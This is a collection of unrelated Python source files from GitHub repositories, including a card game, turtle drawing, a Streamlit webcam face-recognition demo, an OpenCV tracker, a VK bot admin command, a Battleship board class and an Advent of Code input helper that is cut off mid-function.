respuesta = input("¿Quieres otra carta?: ")
else:
if suma_total == 1:
print("Te has plantado con " + str(suma_total) + " punto")
else:
print("Te has plantado con " + str(suma_total) + " puntos")
lista_puntuaje.append(suma_total)
if suma_total > limite:
suma_total -= limite
lista.append(suma_total)
elif suma_total < limite:
suma_total = limite - suma_total
lista.append(suma_total)
elif suma_total == limite:
suma_total = 0
lista.append(suma_total)
time.sleep(1.2)
os.system('cls')
minimo = min(lista)
punt = minimo
diferencias = lista
lista_ganadores = []
for i in range(0, len(diferencias)):
if diferencias[i] == punt:
lista_ganadores.append(i)
for i in lista_ganadores:
if len(lista_ganadores) == 1:
print("Ha ganado el jugador " + str(lista_ganadores[0] + 1) + "\n")
else:
print("Han quedado empate")
jugador = 0
for jug in range(num_jugadores):
print("El jugador " + str(jugador + 1) + " ha sacado un " + str(lista_puntuaje[0]) + ", se ha quedado a " + str(lista[0]) + " puntos.")
jugador += 1
lista.remove(lista[0])
lista_puntuaje.remove(lista_puntuaje[0])
(sieteymedio(2))
| XxEduBoss/ejerciciospython | 7ymedio.py | 7ymedio.py | py | 3,737 | python | es | code | 0 | github-code | 50 |
30945998017 | import turtle
turtle.setup(800, 600, 0, 0)
wn = turtle.Screen()
wn.bgcolor('white')
leonardo = turtle.Pen()
leonardo.color('blue')
leonardo.speed(0)
for x in range(200):
leonardo.width(x/100 + 1)
leonardo.forward(x)
leonardo.left(59)
turtle.exitonclick()
| mentecatoDev/intermezzo | docs/eje_la_tortuga_que_dibuja/eje0202.py | eje0202.py | py | 271 | python | en | code | 1 | github-code | 50 |
35721310194 | import streamlit as st
import numpy as np
import onnxruntime as rt
import mediapipe as mp
import os
import cv2
import av
from typing import List
from streamlit_webrtc import webrtc_streamer, WebRtcMode
from twilio.rest import Client
from skimage.transform import SimilarityTransform
from types import SimpleNamespace
from sklearn.metrics.pairwise import cosine_distances
# ---------------------------------------------------------------------------------------------------------------------
# Define a class to store a detection
class Detection(SimpleNamespace):
bbox: List[List[float]] = None
landmarks: List[List[float]] = None
# Define a class to store an identity
class Identity(SimpleNamespace):
detection: Detection = Detection()
name: str = None
embedding: np.ndarray = None
face: np.ndarray = None
# Define a class to store a match
class Match(SimpleNamespace):
subject_id: Identity = Identity()
gallery_id: Identity = Identity()
distance: float = None
name: str = None
# Similarity threshold for face matching
SIMILARITY_THRESHOLD = 1.0
# Get twilio ice server configuration using twilio credentials from environment variables (set in streamlit secrets)
# Ref: https://www.twilio.com/docs/stun-turn/api
ICE_SERVERS = Client(os.environ["TWILIO_ACCOUNT_SID"], os.environ["TWILIO_AUTH_TOKEN"]).tokens.create().ice_servers
# Init face detector and face recognizer
FACE_RECOGNIZER = rt.InferenceSession("model.onnx", providers=rt.get_available_providers())
FACE_DETECTOR = mp.solutions.face_mesh.FaceMesh(
refine_landmarks=True, min_detection_confidence=0.5, min_tracking_confidence=0.5, max_num_faces=7
)
# ---------------------------------------------------------------------------------------------------------------------
def detect_faces(frame: np.ndarray) -> List[Detection]:
# Process the frame with the face detector
result = FACE_DETECTOR.process(frame)
# Initialize an empty list to store the detected faces
detections = []
# Check if any faces were detected
if result.multi_face_landmarks:
# Iterate over each detected face
for count, detection in enumerate(result.multi_face_landmarks):
# Select 5 Landmarks
five_landmarks = np.asarray(detection.landmark)[[470, 475, 1, 57, 287]]
# Extract the x and y coordinates of the landmarks of interest
landmarks = np.asarray(
[[landmark.x * frame.shape[1], landmark.y * frame.shape[0]] for landmark in five_landmarks]
)
# Extract the x and y coordinates of all landmarks
all_x_coords = [landmark.x * frame.shape[1] for landmark in detection.landmark]
all_y_coords = [landmark.y * frame.shape[0] for landmark in detection.landmark]
# Compute the bounding box of the face
x_min, x_max = int(min(all_x_coords)), int(max(all_x_coords))
y_min, y_max = int(min(all_y_coords)), int(max(all_y_coords))
bbox = [[x_min, y_min], [x_max, y_max]]
# Create a Detection object for the face
detection = Detection(idx=count, bbox=bbox, landmarks=landmarks, confidence=None)
# Add the detection to the list
detections.append(detection)
# Return the list of detections
return detections
def recognize_faces(frame: np.ndarray, detections: List[Detection]) -> List[Identity]:
if not detections:
return []
identities = []
for detection in detections:
# ALIGNMENT -----------------------------------------------------------
# Target landmark coordinates (as used in training)
landmarks_target = np.array(
[
[38.2946, 51.6963],
[73.5318, 51.5014],
[56.0252, 71.7366],
[41.5493, 92.3655],
[70.7299, 92.2041],
],
dtype=np.float32,
)
tform = SimilarityTransform()
tform.estimate(detection.landmarks, landmarks_target)
tmatrix = tform.params[0:2, :]
face_aligned = cv2.warpAffine(frame, tmatrix, (112, 112), borderValue=0.0)
# ---------------------------------------------------------------------
# INFERENCE -----------------------------------------------------------
# Inference face embeddings with onnxruntime
input_image = (np.asarray([face_aligned]).astype(np.float32) / 255.0).clip(0.0, 1.0)
embedding = FACE_RECOGNIZER.run(None, {"input_image": input_image})[0][0]
# ---------------------------------------------------------------------
# Create Identity object
identities.append(Identity(detection=detection, embedding=embedding, face=face_aligned))
return identities
def match_faces(subjects: List[Identity], gallery: List[Identity]) -> List[Match]:
if len(gallery) == 0 or len(subjects) == 0:
return []
# Get Embeddings
embs_gal = np.asarray([identity.embedding for identity in gallery])
embs_det = np.asarray([identity.embedding for identity in subjects])
# Calculate Cosine Distances
cos_distances = cosine_distances(embs_det, embs_gal)
# Find Matches
matches = []
for ident_idx, identity in enumerate(subjects):
dists_to_identity = cos_distances[ident_idx]
idx_min = np.argmin(dists_to_identity)
if dists_to_identity[idx_min] < SIMILARITY_THRESHOLD:
matches.append(Match(subject_id=identity, gallery_id=gallery[idx_min], distance=dists_to_identity[idx_min]))
# Sort Matches by identity_idx
matches = sorted(matches, key=lambda match: match.gallery_id.name)
return matches
def draw_annotations(frame: np.ndarray, detections: List[Detection], matches: List[Match]) -> np.ndarray:
shape = np.asarray(frame.shape[:2][::-1])
# Upscale frame to 1080p for better visualization of drawn annotations
frame = cv2.resize(frame, (1920, 1080))
upscale_factor = np.asarray([1920 / shape[0], 1080 / shape[1]])
shape = np.asarray(frame.shape[:2][::-1])
# Make frame writeable (for better performance)
frame.flags.writeable = True
# Draw Detections
for detection in detections:
# Draw Landmarks
for landmark in detection.landmarks:
cv2.circle(frame, (landmark * upscale_factor).astype(int), 2, (255, 255, 255), -1)
# Draw Bounding Box
cv2.rectangle(
frame,
(detection.bbox[0] * upscale_factor).astype(int),
(detection.bbox[1] * upscale_factor).astype(int),
(255, 0, 0),
2,
)
# Draw Index
cv2.putText(
frame,
str(detection.idx),
(
((detection.bbox[1][0] + 2) * upscale_factor[0]).astype(int),
((detection.bbox[1][1] + 2) * upscale_factor[1]).astype(int),
),
cv2.LINE_AA,
0.5,
(0, 0, 0),
2,
)
# Draw Matches
for match in matches:
detection = match.subject_id.detection
name = match.gallery_id.name
# Draw Bounding Box in green
cv2.rectangle(
frame,
(detection.bbox[0] * upscale_factor).astype(int),
(detection.bbox[1] * upscale_factor).astype(int),
(0, 255, 0),
2,
)
# Draw Banner
cv2.rectangle(
frame,
(
(detection.bbox[0][0] * upscale_factor[0]).astype(int),
(detection.bbox[0][1] * upscale_factor[1] - (shape[1] // 25)).astype(int),
),
(
(detection.bbox[1][0] * upscale_factor[0]).astype(int),
(detection.bbox[0][1] * upscale_factor[1]).astype(int),
),
(255, 255, 255),
-1,
)
# Draw Name
cv2.putText(
frame,
name,
(
((detection.bbox[0][0] + shape[0] // 400) * upscale_factor[0]).astype(int),
((detection.bbox[0][1] - shape[1] // 50) * upscale_factor[1]).astype(int),
),
cv2.LINE_AA,
0.7,
(0, 0, 0),
2,
)
# Draw Distance
cv2.putText(
frame,
f" Distance: {match.distance:.2f}",
(
((detection.bbox[0][0] + shape[0] // 400) * upscale_factor[0]).astype(int),
((detection.bbox[0][1] - shape[1] // 350) * upscale_factor[1]).astype(int),
),
cv2.LINE_AA,
0.5,
(0, 0, 0),
2,
)
return frame
def video_frame_callback(frame: av.VideoFrame) -> av.VideoFrame:
# Convert frame to numpy array
frame = frame.to_ndarray(format="rgb24")
# Run face detection
detections = detect_faces(frame)
# Run face recognition
subjects = recognize_faces(frame, detections)
# Run face matching
matches = match_faces(subjects, gallery)
# Draw annotations
frame = draw_annotations(frame, detections, matches)
# Convert frame back to av.VideoFrame
frame = av.VideoFrame.from_ndarray(frame, format="rgb24")
return frame
# ---------------------------------------------------------------------------------------------------------------------
# Streamlit app configuration
# Set page layout for streamlit to wide
st.set_page_config(layout="wide", page_title="Live Webcam Face Recognition", page_icon=":sunglasses:")
# Title
st.title("Live Webcam Face Recognition")
# Face gallery
st.markdown("**Face Gallery**")
gal_container = st.container()
files = gal_container.file_uploader(
"Upload images to gallery",
type=["png", "jpg", "jpeg"],
accept_multiple_files=True,
label_visibility="collapsed",
)
# Process uploaded files and add to gallery
gallery = []
for file in files:
# Read file bytes
file_bytes = np.asarray(bytearray(file.read()), dtype=np.uint8)
# Decode image and convert from BGR to RGB
img = cv2.cvtColor(cv2.imdecode(file_bytes, cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB)
# Detect faces
detections = detect_faces(img)
if detections:
# recognize faces
subjects = recognize_faces(img, detections[:1]) # take only one face
# Add subjects to gallery
gallery.append(
Identity(name=os.path.splitext(file.name)[0], embedding=subjects[0].embedding, face=subjects[0].face)
)
# Preview gallery images
gal_container.image(image=[identity.face for identity in gallery], caption=[identity.name for identity in gallery])
# Main window for stream
st.markdown("**Live Stream**")
# Start streaming component
with st.container():
webrtc_streamer(
key="LiveFaceRecognition",
mode=WebRtcMode.SENDRECV,
video_frame_callback=video_frame_callback,
rtc_configuration={"iceServers": ICE_SERVERS},
media_stream_constraints={"video": {"width": 1280}, "audio": False},
)
# except:
# st.error("There is a problem with your webcam. Try a different Browser or device.")
| Martlgap/livefaceidapp | main.py | main.py | py | 11,160 | python | en | code | 19 | github-code | 50 |
22417525136 | # Libraries
########################################################################################################################
import numpy as np
import cv2 as cv
import matplotlib.pyplot as plt
########################################################################################################################
# Custom Functions
########################################################################################################################
# _Функция получение координат точки или обьекта по щелчку мыши
# (Function to get the coordinates of a point or object on a mouse click)
def TakeCoordinates(event, x_cord, y_cord, flags, param):
if event == cv.EVENT_LBUTTONDOWN:
pixelCord[0] = x_cord
pixelCord[1] = y_cord
cv.putText(img2, "%d-%d" % (x, y), (x + 10, y - 10), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)
def Write_to_data_array(pixelCord):
x_cord, y_cord = ConvertationPixelINCoordinates(pixelCord[0], pixelCord[1])
xy_coordinates[0] = x_cord
xy_coordinates[1] = y_cord
if len(data_inf) <= (injured_number * 2):
data_inf.append(xy_coordinates[0])
data_inf.append(xy_coordinates[1])
else:
if len(data_img) < 4:
data_img.append(xy_coordinates[0])
data_img.append(xy_coordinates[1])
# _Функция определения ориентации //Написать//
# (Object Orientation Function)
def Object_Orientation_Function():
angle = 1
return angle
# _Расчет центра квадрата, описывающего искомый обьект
# (Calculation of the center of the square describing the desired object)
def CalculationCenterSquare(number_1, number_2):
x_cord = number_1 / 5
y_cord = number_2 / 5
return x_cord, y_cord
# Преобразование пикселей в координаты
# (Converting income to coordinates)
def ConvertationPixelINCoordinates(x_conv, y_conv):
q = 1.57
cord_x = x_conv * q
cord_y = y_conv * q
return cord_x, cord_y
# Выделение области захвата.
# (Selection of the capture area)
# Изображение ROI
def AreaInit(img_in, list_data):
if len(list_data) >= 4:
# Координаты двух точек прямоугольника искомого изображения
x_1 = list_data[0]
y_1 = list_data[1]
x_2 = list_data[2]
y_2 = list_data[3]
# Получение изображения
if x_1 > x_2:
if y_1 > y_2:
img_cut = img_in[x_2:x_1, y_2:y_1]
else:
img_cut = img_in[x_2:x_1, y_1:y_2]
else:
if y_1 > y_2:
img_cut = img_in[x_1:x_2, y_2:y_1]
else:
img_cut = img_in[x_1:x_2, y_1:y_2]
plt.imsave("img_cut.jpg", img_cut)
########################################################################################################################
# __Переменные__(Variables)
# __Количество целевых точек__(Number of target points)
injured_number = int(input("Input number of injured "))
# __Списки данных__(Data Lists)
xy_coordinates = [0, 0]
data_cord = [0, 0]
data_inf = []
data_img = []
pixelCord = [0, 0]
# __
k_take_xy, x_sum, y_sum, w_sum, h_sum = 0, 0, 0, 0, 0
########################################################################################################################
# __Оновная программа__(Main)
# __ Часть первая. Чтение видео-потока.
cap = cv.VideoCapture(0)#("C:/Users/User_I/Desktop/Poliolimp/bandicam.mp4")
template = cv.imread('C:/Users/User_I/Desktop/Poliolimp/img2.png', 0)
w, h = template.shape[::-1]
methods = ['cv.TM_CCOEFF', 'cv.TM_CCOEFF_NORMED', 'cv.TM_CCORR',
'cv.TM_CCORR_NORMED', 'cv.TM_SQDIFF', 'cv.TM_SQDIFF_NORMED']
if not cap.isOpened():
print("Error video opened") # Ошибка открытия видео
exit()
##########################################################################################
while True:
# Захват кадр за кадром (Capture frame by frame)
ret, frame = cap.read()
if not ret:
print("Can't receive frame (stream end?). Exiting ...") # Не удается получить кадр (конец потока?). Выход...
break
##########################################################################################
AreaInit(frame, data_img)
##########################################################################################
# for meth in methods:
# _, img = cap.read()
# method = eval(meth)
# # Apply template Matching
# img = cv.cvtColor(img, cv.COLOR_RGB2GRAY)
# res = cv.matchTemplate(img, template, method)
# min_val, max_val, min_loc, max_loc = cv.minMaxLoc(res)
# # If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum
# if method in [cv.TM_SQDIFF, cv.TM_SQDIFF_NORMED]:
# top_left = min_loc
# else:
# top_left = max_loc
# x, y = top_left[0], top_left[1]
######################################################################################
cv.setMouseCallback("image", TakeCoordinates)
x, y = pixelCord[0], pixelCord[1]
w1, h1 = 60, 60 # 150, 150
track_window = (x, y, w1, h1)
# set up the ROI for tracking
roi = frame[y:y + h, x:x + w]
hsv_roi = cv.cvtColor(roi, cv.COLOR_BGR2HSV)
# mask = cv.inRange(hsv_roi, np.array((133., 0., 227.)), np.array((180., 255., 255.)))
# mask = cv.inRange(hsv_roi, np.array((120., 110., 215.)), np.array((180., 255., 255.)))
# 115 97 96 255 255 255
mask = cv.inRange(hsv_roi, np.array((144., 0., 205.)), np.array((180., 153., 255.)))
roi_hist = cv.calcHist([hsv_roi], [0], mask, [180], [0, 180])
cv.normalize(roi_hist, roi_hist, 0, 255, cv.NORM_MINMAX)
# Setup the termination criteria, either 10 iteration or move by at least 1 pt
term_crit = (cv.TERM_CRITERIA_EPS | cv.TERM_CRITERIA_COUNT, 10, 1)
while 1:
ret, frame = cap.read()
if ret:
hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)
dst = cv.calcBackProject([hsv], [0], roi_hist, [0, 180], 1)
# apply meanshift to get the new location
ret, track_window = cv.meanShift(dst, track_window, term_crit)
# Draw it on image
x, y, w, h = track_window
##############################################################################################
if k_take_xy < 5:
x_sum += x + w / 2
y_sum += y + h / 2
k_take_xy += 1
else:
data_cord[0], data_cord[1] = CalculationCenterSquare(x_sum, y_sum)
k_take_xy, x_sum, y_sum = 0, 0, 0
###########################################################################################
img2 = cv.rectangle(frame, (x, y), (x + w, y + h), 255, 2)
###########################################################################################
img = cv.cvtColor(frame, cv.COLOR_RGB2GRAY)
cv.namedWindow("image")
cv.setMouseCallback("image", TakeCoordinates)
###########################################################################################
###########################################################################################
if (injured_number * 2) == len(data_inf):
data_inf.append(x)
data_inf.append(y)
data_inf.append(Object_Orientation_Function())
if (injured_number * 2) < len(data_inf):
data_inf[injured_number * 2] = x
data_inf[injured_number * 2 + 1] = y
data_inf[injured_number * 2 + 2] = Object_Orientation_Function()
###########################################################################################
print("data_cord = ", data_cord)
print("xy_coordinates = ", xy_coordinates)
print("data_inf = ", data_inf)
############################################################################################################
cv.imshow('image', img2)
k = cv.waitKey(30) & 0xff
if k == 27:
break
else:
break
# cv.putText(img2, "%d-%d" % (x, y), (x + 10, y - 10), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2) | Royal00Blood/Poliolim-OpenCV-Detect | FindandDetect.py | FindandDetect.py | py | 8,796 | python | en | code | 0 | github-code | 50 |
11609777638 | from database.methods.get import get_all_students, get_student_by_vk_id, get_students_with_admin
from vkbottle import Keyboard, KeyboardButtonColor, Text
from vkbottle.bot import Message, Blueprint
import logging
bp = Blueprint('admin_panel')# Объявляем команду
bp.on.vbml_ignore_case = True # Игнорируем регистр
@bp.on.private_message(text=["админ", 'админка', 'flvby','admin',
"/админ", '/админка', '/flvby','/admin'])
@bp.on.private_message(payload={'cmd': 'admin_panel'})
async def admpanel(message: Message):
logging.info(f'{message.peer_id}: I get admin_panel')
# ID юзера
user_id = message.from_id
student = get_student_by_vk_id(user_id)
# Проверка на админа
if not student.isAdmin:
await message.answer('У тебя нет админских прав!')
return
# Создание клавиатуры
keyboard = (
Keyboard()
.add(Text('Все пользователи', {'cmd': 'all_users_0'}))
.row()
.add(Text('Назад', {'cmd': 'menu'}), color=KeyboardButtonColor.NEGATIVE)
)
admins = get_students_with_admin() # Все админы
admins_id = [admin.vk_id for admin in admins] # IDшники админов
admins = await bp.api.users.get(admins_id) # Инфа из ВК про админов
admins = [f'{admin.first_name} {admin.last_name}' for admin in admins] # Пишем ФИ админов
num_users = len(get_all_students()) # Кол-во пользователей
num_admins = len(admins) # Кол-во админов
await message.answer(f"Число пользователей: {num_users} \nЧисло админов: {num_admins} \n Имена администраторов: {admins}", keyboard=keyboard) | nickname123456/BotNetSchool | vk_bot/commands/admin/admin_panel.py | admin_panel.py | py | 1,865 | python | ru | code | 6 | github-code | 50 |
38616522140 | # В генеалогическом древе у каждого человека, кроме родоначальника,
# есть ровно один родитель. Каждом элементу дерева сопоставляется целое
# неотрицательное число, называемое высотой. У родоначальника высота равна 0,
# у любого другого элемента высота на 1 больше, чем у его родителя.
# Вам дано генеалогическое древо, определите высоту всех его элементов.
n = int(input())
d = {}
s = set()
for _ in range(n - 1):
string = input().split()
s.add(string[0])
s.add(string[1])
if string[0] in d:
d[string[0]].append(string[1])
else:
d[string[0]] = [string[1]]
s = sorted(list(s))
for name in s:
name_p = name
lev = 0
while name in d.keys():
lev += 1
name = d[name][0]
print(name_p, lev)
| AnnaSmelova/Python_programming_basics_course | week7/24_genealogy.py | 24_genealogy.py | py | 1,042 | python | ru | code | 1 | github-code | 50 |
30614528108 | import os
import errno
import pandas as pd
import re
def mkdir_p(path):
"""Create a directory if not exist"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
return
def clean_sentence(sentence):
"""Get rid of trace characters"""
cleaned_sentence = re.sub(r'\*\S*', '', sentence)
cleaned_sentence = cleaned_sentence.replace('0', '')
return cleaned_sentence
def format_context(dialogue):
"""Format a context dialogue, indicating alternating speakers with [SEP] token"""
#cleaned_dialogue = re.sub(r'speaker[a-z][0-9][0-9]?[0-9]?\.', ' [SEP] ', dialogue)
cleaned_dialogue = re.sub(r'speaker[a-z][0-9][0-9]?[0-9]?\.', '', dialogue)
cleaned_dialogue = cleaned_dialogue.replace('###', '')
cleaned_dialogue = clean_sentence(cleaned_dialogue)
return cleaned_dialogue
def read_dataset_split_sentence_only(path_to_dataset):
"""Given a path to a dataset, return the sentence inputs and the probability labels"""
df = pd.read_csv(path_to_dataset, sep='\t')
sentences = df['Question'].tolist()
every_probs = list(df['Every'])
a_probs = list(df['A'])
the_probs = list(df['The'])
other_probs = list(df['Other'])
labels = [[every_probs[i], a_probs[i], the_probs[i], other_probs[i]] for i in range(len(sentences))]
return sentences, labels
def read_dataset_split_with_context(path_to_dataset, num_train_examples=None):
"""Given a path to a dataset, return the complete dialogue inputs and the probability labels"""
df = pd.read_csv(path_to_dataset, sep='\t')
if num_train_examples is not None:
df = df[:num_train_examples]
print('num train examples', len(df))
contexts = list(df['PrecedingContext'])
sentences = list(df['Question'])
dialogues = [contexts[i] + '[SEP]' + sentences[i] for i in range(len(contexts))]
every_probs = list(df['Every'])
a_probs = list(df['A'])
the_probs = list(df['The'])
other_probs = list(df['Other'])
labels = [[every_probs[i], a_probs[i], the_probs[i], other_probs[i]] for i in range(len(sentences))]
return dialogues, labels | dharakyu/wh-questions-lm | utils.py | utils.py | py | 2,073 | python | en | code | 0 | github-code | 50 |
17149404851 | import sys
sys.path.append("..")
from box_coder import DefaultBoxes, Encoder
import torch
def dboxes300_coco():
figsize = 300
feat_size = [38, 19, 10, 5, 3, 1]
steps = [8, 16, 32, 64, 100, 300]
# use the scales here: https://github.com/amdegroot/ssd.pytorch/blob/master/data/config.py
scales = [21, 45, 99, 153, 207, 261, 315]
aspect_ratios = [[2], [2, 3], [2, 3], [2, 3], [2], [2]]
dboxes = DefaultBoxes(figsize, feat_size, steps, scales, aspect_ratios)
return dboxes
if __name__ == "__main__":
dboxes = dboxes300_coco()
encoder = Encoder(dboxes, fast_nms=False)
encoder_fast = Encoder(dboxes, fast_nms=True)
saved_inputs = torch.load('inputs.pth')
bboxes = saved_inputs['bbox'].float()
scores = saved_inputs['scores'].float()
criteria = float(saved_inputs['criteria'])
max_num = int(saved_inputs['max_output'])
print('bboxes: {}, scores: {}'.format(bboxes.shape, scores.shape))
for i in range(bboxes.shape[0]):
box1, label1, score1 = encoder.decode_batch(bboxes[i, :, :].unsqueeze(0), scores[i, :, :].unsqueeze(0), criteria, max_num)[0]
box2, label2, score2 = \
encoder_fast.decode_batch(bboxes[i, :, :].unsqueeze(0), scores[i, :, :].unsqueeze(0), criteria, max_num)[0]
print('label: {}, fast label: {}'.format(label1, label2))
| Deep-Spark/DeepSparkHub | cv/detection/ssd/pytorch/base/test/box_coder_test.py | box_coder_test.py | py | 1,345 | python | en | code | 28 | github-code | 50 |
31168514697 | import random
import math
class Deck():
def __init__(self, deck_array=None):
"""
Deck can either be the game deck to be dealt out
or can be the hand a Player has, based on whether
we set deck_array in the initialization
if not set, we create a full deck
if not, we want the Player's hand to have the same
functions as the regular deck but with only so many cards
"""
self.heart = '♥'
self.diamond = '♦'
self.spade = '♠'
self.club = '♣'
# map number and suit to num value
# Spade 1-13, Heart 1-13, Club 1-13, Diamond 1-13
self.suit_array = ['Spade', 'Heart', 'Club', 'Diamond']
self.char_suit_dict = {'♠': 0, '♥': 1, '♦': 2, '♣': 3}
if deck_array:
self.deck_array = deck_array
self.int_deck_array = self.hand_cards_to_hand_numbers(self.deck_array)
# sort the hands
self.deck_array.sort(key=self.map_card_to_number_value)
self.int_deck_array.sort()
return
self.deck_array = list()
# initialize deck
for x in range(1,14):
val = str(x)
if x == 1:
val = 'A'
if x == 11:
val = 'J'
if x == 12:
val = 'Q'
if x == 13:
val = 'K'
self.deck_array.append(val + self.heart)
self.deck_array.append(val + self.diamond)
self.deck_array.append(val + self.spade)
self.deck_array.append(val + self.club)
self.int_deck_array = self.hand_cards_to_hand_numbers(self.deck_array)
# sort the decks
self.deck_array.sort(key=self.map_card_to_number_value)
self.int_deck_array.sort()
# print the face value and associated number value for each card
# for i in range(52):
# print(self.deck_array[i], str(self.int_deck_array[i]))
def shuffle_deck(self):
"""
randomizes the cards in the deck
"""
random.shuffle(self.deck_array)
def hand_cards_to_hand_numbers(self, hand):
"""
maps the entire hand from the face value to the integer value
"""
ret = []
for card in hand:
ret.append(self.map_card_to_number_value(card))
return ret
def map_card_to_number_value(self, value):
"""
maps the face value of the card to the integer value
Aces are high, so we count it as 13, not 1
"""
# if length is 3, we know it is a 10 of a suit
if len(value) == 3:
suit_val = self.char_suit_dict.get(value[2]) * 13
suit_val += 8
else:
suit_val = self.char_suit_dict.get(value[1]) * 13
if value[0] == 'A':
suit_val += 12
elif value[0] == 'J':
suit_val += 9
elif value[0] == 'Q':
suit_val += 10
elif value[0] == 'K':
suit_val += 11
else:
suit_val += (int(value[0]) - 2)
return suit_val
def get_key_from_val(self, val, dicter):
"""
helper function for mapping
"""
for key in dicter.keys():
if dicter[key] == val:
return key
def hand_numbers_to_hand_cards(self, int_hand):
"""
maps the entire hand from the integer value to the face value
"""
ret = []
for card in int_hand:
ret.append(self.map_card_to_hand(card))
return ret
def map_card_to_hand(self, value):
"""
maps the integer value of the card to the face value
"""
if value / 13 == 4:
suit = '♣'
else:
suit = self.get_key_from_val(math.floor(value / 13), self.char_suit_dict)
num = value % 13
card = num
if num == 1:
card = 'A'
if num == 11:
card = 'J'
if num == 12:
card = 'Q'
if num == 0:
card = 'K'
return str(card) + suit
def remove_card(self, index):
"""
removes the card from the deck
I use this after Player plays a card
should never be used in the actual gameplay
"""
self.deck_array.pop(index)
self.int_deck_array.pop(index)
def convert_external_card_to_int(self, card):
return self.map_card_to_number_value(card) | voidiker66/PyHearts | Deck.py | Deck.py | py | 3,668 | python | en | code | 1 | github-code | 50 |
70485352157 | from ship import Ship
from square import Square
class Ocean():
width = 10
height = 10
def __init__(self, owner):
self.board = []
self.ships = []
self.owner = owner
for y in range(self.height):
row = []
for x in range(self.width):
row.append(Square(x, y, Square.SQUARE_STATES['empty']))
self.board.append(row)
def get_ships(self):
return self.ships
def get_board(self):
return self.board
def is_ship_on_board(self, ship):
'''Return True if ship will fit on board, else False'''
ship_territory = ship.get_territory()
for x, y in ship_territory:
if x not in range(self.width):
return False
if y not in range(self.height):
return False
return True
def is_ship_location_valid(self, ship):
'''Return True if ship will not overlap or touch other ships, else False'''
ship_region = ship.get_region()
for x, y in ship_region:
try:
square = self.board[y][x]
except IndexError:
pass
else:
if square.get_status() == Square.SQUARE_STATES['ship']:
return False
return True
def add_ship(self, x, y, is_horizontal, ship_type):
''' Tries to add ship to board. Returns True if ship has been added to board, else False'''
ship = Ship(x, y, is_horizontal, ship_type)
ship_territory = ship.get_territory()
if self.is_ship_on_board(ship) and self.is_ship_location_valid(ship):
for x, y in ship_territory:
square = self.board[y][x]
square.set_status('ship')
self.ships.append(ship)
return True
else:
return False
def print_ocean(self, player):
'''If player is the owner of the ocean prints board with all ships,
else board with only hit squares of ships'''
coordinates = (' ', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J')
print("This board belongs to: " + self.owner + "\n")
print(" ".join(coordinates))
print("--------------------------------------------")
for y in range(self.height):
print(str(y + 1).rjust(2) + " | ", end="")
for x in range(self.width):
square = self.board[y][x]
if player != self.owner and square.get_status() == Square.SQUARE_STATES['ship']:
print(" ", end=" | ")
else:
print(square, end=" | ")
print("\n" + "--------------------------------------------")
| SebastianHalinski/Battleship | ocean.py | ocean.py | py | 2,748 | python | en | code | 0 | github-code | 50 |
37701303517 | class Solution:
def maxArea(self, height):
"""
:type height: List[int]
:rtype: int
Idea: lower a horizontal line with width n down
the array. In each iteration keep track of the
lowest and highest indices of elements that reach
to the line or beyond. Muliply the difference of
this extrema indices with the current level
of the horizontal line.
Runtime: 76 ms, faster than 50.66% of Python3 online submissions for Container With Most Water.
Runtime: O(n * log(n))
"""
n = len(height)-1
d = dict()
i = 0
for e in height:
if e not in d:
d[e] = [i,]
else:
d[e].append(i)
i += 1
# we sort here n indices
# O(n * log(n))
for key in d:
d[key].sort()
sorted_keys = sorted(d.keys(), reverse=True)
m = 0
highest = 0
lowest = n
for k in sorted_keys:
highest = max(d[k][-1], highest)
lowest = min(d[k][0], lowest)
test = k * (highest-lowest)
if test >= m:
m = test
if m > (k * n):
return m
return m
a = [1,8,6,2,5,4,8,3,7]
b = range(10000)
s = Solution()
print(s.maxArea(b))
| NikolaiT/incolumitas | content/Interview/src/water6.py | water6.py | py | 1,435 | python | en | code | 17 | github-code | 50 |
7014122383 | #Jonathan Dang | PP2.16 | Assignment 1
#I Jonathan Dang do hereby certify that I have derived no assistance for this project or examination from any sources whatever, whether oral, written, or in print
#except from explicit descrestion from the source material itself.
#PP2.16 Write a program that reads a five-digit positive integer and breaks it into a sequence of individual digits. For example, the input 16384 is displayed as
# 1 6 3 8 4
#INPUT: 5 digit number
#OUTPUT: 5 numbers printed, space seperated
while(True):
userInput = input("Please enter a 5 digit number[10000 -> 99999]: ")
if(len(userInput) != 5):
print("Invalid input")
else:
break;
first = userInput[0]; second = userInput[1]; third = userInput[2]; fourth = userInput[3]; fifth = userInput[4]
print(first + ' ' + second + ' ' + third + ' ' + fourth + ' ' + fifth)
'''
Please enter a 5 digit number[10000 -> 99999]: 16384
1 6 3 8 4
''' | Jonathan-Dang/CS3C | Assignment1/PP2-16.py | PP2-16.py | py | 959 | python | en | code | 0 | github-code | 50 |
38682123289 | import sys
from pathlib import Path
from timeit import default_timer as timer
from . import http
SCRIPT_PATH = Path(sys.argv[0])
SCRIPT_DIR = SCRIPT_PATH.parent
ROOT_DIR = SCRIPT_DIR.parent.parent
PUZZLE_DAY = SCRIPT_DIR.name
PUZZLE_YEAR = SCRIPT_DIR.parent.name
CHALLENGE_COUNT = 0
TOTAL_TIME = 0
def get_input(delim='\n', data_type=str):
test_input()
with Path(SCRIPT_DIR, 'input.txt').open('r') as f:
input_text = f.read()
res = [data_type(line) for line in input_text.split(delim) if line]
return res
def get_example(delim='\n', data_type=str):
test_input()
with Path(SCRIPT_DIR, 'example.txt').open('r') as f:
input_text = f.read()
res = [data_type(line) for line in input_text.split(delim) if line]
return res
def run(callback, *args, **kwargs):
global CHALLENGE_COUNT
global TOTAL_TIME
CHALLENGE_COUNT += 1
print(f'--- Challenge {CHALLENGE_COUNT}')
start = timer()
res = callback(*args, **kwargs)
end = timer()
delta_ms = (end - start) * 1000
TOTAL_TIME += delta_ms
print(f'Output: {res}')
print(f'Took: {delta_ms:.2f}ms')
print()
return res
def test_input():
if not Path(SCRIPT_DIR, 'input.txt').is_file():
session_cookie = http.get_session_cookie(ROOT_DIR)
if session_cookie is None:
print('[AoC] No input found! Please download the input first, or put your session cookie in '
'_session.txt to download the input automatically.')
sys.exit(1)
print('[AoC] Automatically downloading input data...')
try:
input_data = http.download_input(session_cookie, int(PUZZLE_YEAR), int(PUZZLE_DAY))
